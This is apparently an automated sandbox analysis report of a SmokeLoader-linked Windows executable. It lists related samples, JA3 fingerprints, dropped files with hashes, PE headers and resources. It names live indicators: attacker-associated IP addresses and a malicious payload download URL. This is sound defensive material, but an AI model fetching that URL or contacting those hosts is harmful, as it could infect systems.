	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	6NlY2E3Wqi.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	RWcyVDbMGQ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	C1APU2jz2B.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Get hash	malicious	Metasploit	Browse	23.145.40.164
	SecuriteInfo.com.Win64.Evo-gen.19321.5552.exe	Get hash	malicious	Unknown	Browse	23.145.40.164
	SecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exe	Get hash	malicious	Metasploit	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	6NlY2E3Wqi.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.145.40.162
	file.exe	Get hash	malicious	LummaC	Browse	23.145.40.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.145.40.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.145.40.162
	PO554830092024.xls	Get hash	malicious	Unknown	Browse	23.145.40.162
	PI#0034250924.xla.xlsx	Get hash	malicious	Unknown	Browse	23.145.40.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.145.40.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.145.40.162
	Transmission Cost Database 2.0.xlsb	Get hash	malicious	Unknown	Browse	23.145.40.162
	https://downcheck.nyc3.cdn.digitaloceanspaces.com/peltgon.zip	Get hash	malicious	LummaC	Browse	23.145.40.162

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	78336
Entropy (8bit):	6.402020595859839
Encrypted:	false
SSDEEP:	768:QozFFTtEEIfasEakYqzeEjKVGNdNmNvfkzgRn4iyffxhg2pP1R4vVxe9QdD4ZL/7:9oEiHw2VeUh+xnP1u2+m9eQ5M4WiXD4
MD5:	815279E7D757D334D6E9EF9B249CA705
SHA1:	6EFA4A8B6B1208C1577E1853AC7B37516028C260
SHA-256:	ADDFF5036F4E03D01A52B7F093344DE06808847B09939E06465DBA47A8A90D73
SHA-512:	8B86AFA38197E00D622A9785A679C85DFACF9485593E51328E776DA2B4C9E68A9C63282515E14A6F044BB4038D02081EBCED25B9BC597BAC10AE3A5AAD123FC6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d...r..f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text...t........................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4470.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245248
Entropy (8bit):	6.316692295086417
Encrypted:	false
SSDEEP:	3072:R5LmpK7i3CNp0dy3pHO5gW46ZtyP9vQwDjNfBro:R5L37s7gfVSylQwDH
MD5:	D07C1E0124B1CFA23AA3699216AA912F
SHA1:	1AA10CD574851FF97C478E782272AE92E921BC3D
SHA-256:	61F92984F8DB5F32D43674012697FBDEF0224811AB64FB30759CC66454FB03AD
SHA-512:	C978D85C56B5ED07EFFB39C3B364E4FA37B879E4B5D6B3C14FCD42A1E1EB48CE6886E48402AF6EAF7D6F94D4C4A169A43837E380EBF9E97399B628355794EA80
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IC...C...C...]..._...]...P...].......du..D...C...2...]...B...]...B...]...B...RichC...........................PE..L.....e..........................................@..........................P..............................................t...P....P..p............................................................................................................text....~.......................... ..`.rdata... ......."..................@..@.data...............................@....tls.........@......................@....rsrc...p....P......................@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E276.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E276.tmp-shm

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E7F5.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ECAA.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ED86.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EE52.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EF9B.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F0F4.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F1A1.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\dugwjjb

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	290443
Entropy (8bit):	7.999381569365727
Encrypted:	true
SSDEEP:	6144:RnjMDps+MheEgjtCsXgKJhwra2wEMxiOKx:RnjypsQj1DhwGEMxxS
MD5:	75E62AC701925290EBAA3F00A997E3A3
SHA1:	40BC204B041F98F05986BE6F427BB99C5C56EE2B
SHA-256:	A222B4A9482E2D85502214D13ACDB9B89F11299C2B763DDFA5EF5FB42A5389F2
SHA-512:	BDA3E27C9E7B55D1FA879C0675E7875FD999507FC61112CB4F1B924C010F686C5E47FDE9D5FD2378B2849C424FBEFA064343EC3470C5DFDB4F8F721E487648EE
Malicious:	false
Preview:	@.M...].i..R[.V.7..F........f..c.....T.y....w ...k.<M.c..0..9.].n^$t..L...\...z,..E.y.N l..\.g...Z.'..u.....q..o.HE$.Y..X^E$...AN..FF.c..[.2#.....W..@2....2#/o...O..QH.Gn.7.....nJ".c.#..$;R.\|i.8;[.A.....s.&.@XK0..\|..n.y.e.}.....LC...e...Q.5a..F.r...-y...o........g...#R'.[....S..e.Q.ud9H..);.B...0"P........w..r..}.F......1.47.\|Uw.!S..~.[..?.q.c.R.\|k..L..u........5.~.=....q......\.<.T..W?....y.{........_...}s...U..<.."......mN,\|7. ...(.\|L+..pO...m)=+,N:..%..3..hd\|....K?..\|=o2.H....^~..F$8....T......:MzY.sw.so...3,...F..C{.J#....18Q}j;..(.....B.;.h..\..A......u E.....[^.GF..7q.p.a.Q ....9...8...7.i.. ..W3..!_.`..../.<.J...y...A.5I..c......xR..C...z..#....(.M.uh\|6.....q>...]. ...../.>.j...O...a...rh.M...y.v.F.C(...%../,.v.X...mb..H.yG~....l,...W.PE.h....Q...YH....J.........cyPcn.;.j7.E..ul....X....%.....0z....bN.h..j......x..P\.yP.....[.6A=.f@..o.n...^Y-3..*....^...J.LY...l....,.u= q..a...2..q..T..K...-..R...~qk...f0P.5y

C:\Users\user\AppData\Roaming\fihcrfb

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245248
Entropy (8bit):	6.316692295086417
Encrypted:	false
SSDEEP:	3072:R5LmpK7i3CNp0dy3pHO5gW46ZtyP9vQwDjNfBro:R5L37s7gfVSylQwDH
MD5:	D07C1E0124B1CFA23AA3699216AA912F
SHA1:	1AA10CD574851FF97C478E782272AE92E921BC3D
SHA-256:	61F92984F8DB5F32D43674012697FBDEF0224811AB64FB30759CC66454FB03AD
SHA-512:	C978D85C56B5ED07EFFB39C3B364E4FA37B879E4B5D6B3C14FCD42A1E1EB48CE6886E48402AF6EAF7D6F94D4C4A169A43837E380EBF9E97399B628355794EA80
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IC...C...C...]..._...]...P...].......du..D...C...2...]...B...]...B...]...B...RichC...........................PE..L.....e..........................................@..........................P..............................................t...P....P..p............................................................................................................text....~.......................... ..`.rdata... ......."..................@..@.data...............................@....tls.........@......................@....rsrc...p....P......................@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hehcrfb

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.325912157408103
Encrypted:	false
SSDEEP:	6144:OLnLL986Ud1X1vkdss3LqwVSy391vg+MDH:ObLBU10ss7bEy3Dv4z
MD5:	2A6994149BAFF1E680719F89062BFCC7
SHA1:	62ABD53B0DB022F2D20CB7BA5E1F2373753ECBA1
SHA-256:	CE434BC783D75CCEAFBDDD59DD3ED43D4BF1811E0344BA5FDC6958AF146254E7
SHA-512:	76EEE99798DE6E20A08AD3CC7F3044C5CFD7025B0ECE2277E00772E322FA6B3C13449A0A10E4990F5B0A013206ECFEEFA86D336B751D3CA59CC5C998585D252D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IC...C...C...]..._...]...P...].......du..D...C...2...]...B...]...B...]...B...RichC...........................PE..L..."..d..........................................@..........................`......;.......................................t...P....`..p............................................................................................................text.............................. ..`.rdata... ......."..................@..@.data...............................@....tls.........P......................@....rsrc...p....`......................@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hehcrfb:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.325912157408103
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	OCYe9qcxiM.exe
File size:	245'760 bytes
MD5:	2a6994149baff1e680719f89062bfcc7
SHA1:	62abd53b0db022f2d20cb7ba5e1f2373753ecba1
SHA256:	ce434bc783d75cceafbddd59dd3ed43d4bf1811e0344ba5fdc6958af146254e7
SHA512:	76eee99798de6e20a08ad3cc7f3044c5cfd7025b0ece2277e00772e322fa6b3c13449a0a10e4990f5b0a013206ecfeefa86d336b751d3ca59cc5c998585d252d
SSDEEP:	6144:OLnLL986Ud1X1vkdss3LqwVSy391vg+MDH:ObLBU10ss7bEy3Dv4z
TLSH:	0C34D662FDE17C11EAAA87358F399ADC2B2EBC525E31535D21043A0F1A725B0D54B732
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IC...C...C...]..._...]...P...].......du..D...C...2...]...B...]...B...]...B...RichC...........................PE..L..."..d...

File Icon


Icon Hash:	738733b183a38be4

Static PE Info

General

Entrypoint:	0x40151c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64A90922 [Sat Jul 8 06:58:42 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7e9e0d154ce1bd1036946ac6101b3bb4

Entrypoint Preview

Instruction
call 00007FB631039495h
jmp 00007FB6310356CEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041E858h], eax
mov dword ptr [0041E854h], ecx
mov dword ptr [0041E850h], edx
mov dword ptr [0041E84Ch], ebx
mov dword ptr [0041E848h], esi
mov dword ptr [0041E844h], edi
mov word ptr [0041E870h], ss
mov word ptr [0041E864h], cs
mov word ptr [0041E840h], ds
mov word ptr [0041E83Ch], es
mov word ptr [0041E838h], fs
mov word ptr [0041E834h], gs
pushfd
pop dword ptr [0041E868h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041E85Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041E860h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041E86Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041E7A8h], 00010001h
mov eax, dword ptr [0041E860h]
mov dword ptr [0041E75Ch], eax
mov dword ptr [0041E750h], C0000409h
mov dword ptr [0041E754h], 00000001h
mov eax, dword ptr [0041D004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041D008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000CCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1b774	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x116000	0x1f970	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1b480	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1a000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x180cf	0x18200	ddb890e91cb3c4094add24332f80eb96	False	0.792159164507772	data	7.489225566155988	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1a000	0x2090	0x2200	939e421469750d3b1515766a2170fd78	False	0.36638327205882354	data	5.489393579322007	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1d000	0xf7ff8	0x1800	0494fbbd3a000ed0f437f8b249b479db	False	0.2591145833333333	data	2.663555604464713	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x115000	0x51d	0x600	53e979547d8c2ea86560ac45de08ae25	False	0.013020833333333334	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x116000	0x1f970	0x1fa00	8e3f0e050d28a9d06a9b83ddd39d11b8	False	0.41916532855731226	data	5.111460066928023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x12e178	0x2	data			5.0
BUXILODUGEDUPUCEGAT	0x12d580	0xbf7	ASCII text, with very long lines (3063), with no line terminators	Turkish	Turkey	0.6000652954619654
RT_CURSOR	0x12e180	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x12e2b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x116b10	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5738272921108742
RT_ICON	0x1179b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6502707581227437
RT_ICON	0x118260	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.7056451612903226
RT_ICON	0x118928	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7557803468208093
RT_ICON	0x118e90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5276970954356847
RT_ICON	0x11b438	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6343808630393997
RT_ICON	0x11c4e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6442622950819672
RT_ICON	0x11ce68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7774822695035462
RT_ICON	0x11d348	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3427505330490405
RT_ICON	0x11e1f0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5311371841155235
RT_ICON	0x11ea98	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6123271889400922
RT_ICON	0x11f160	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6654624277456648
RT_ICON	0x11f6c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.4285269709543568
RT_ICON	0x121c70	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5159836065573771
RT_ICON	0x1225f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5132978723404256
RT_ICON	0x122ac8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39712153518123666
RT_ICON	0x123970	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5582129963898917
RT_ICON	0x124218	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6267281105990783
RT_ICON	0x1248e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6416184971098265
RT_ICON	0x124e48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.4477016885553471
RT_ICON	0x125ef0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.43934426229508194
RT_ICON	0x126878	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.48138297872340424
RT_ICON	0x126d48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.3307569296375267
RT_ICON	0x127bf0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.40252707581227437
RT_ICON	0x128498	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.3986175115207373
RT_ICON	0x128b60	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.40534682080924855
RT_ICON	0x1290c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.15809128630705394
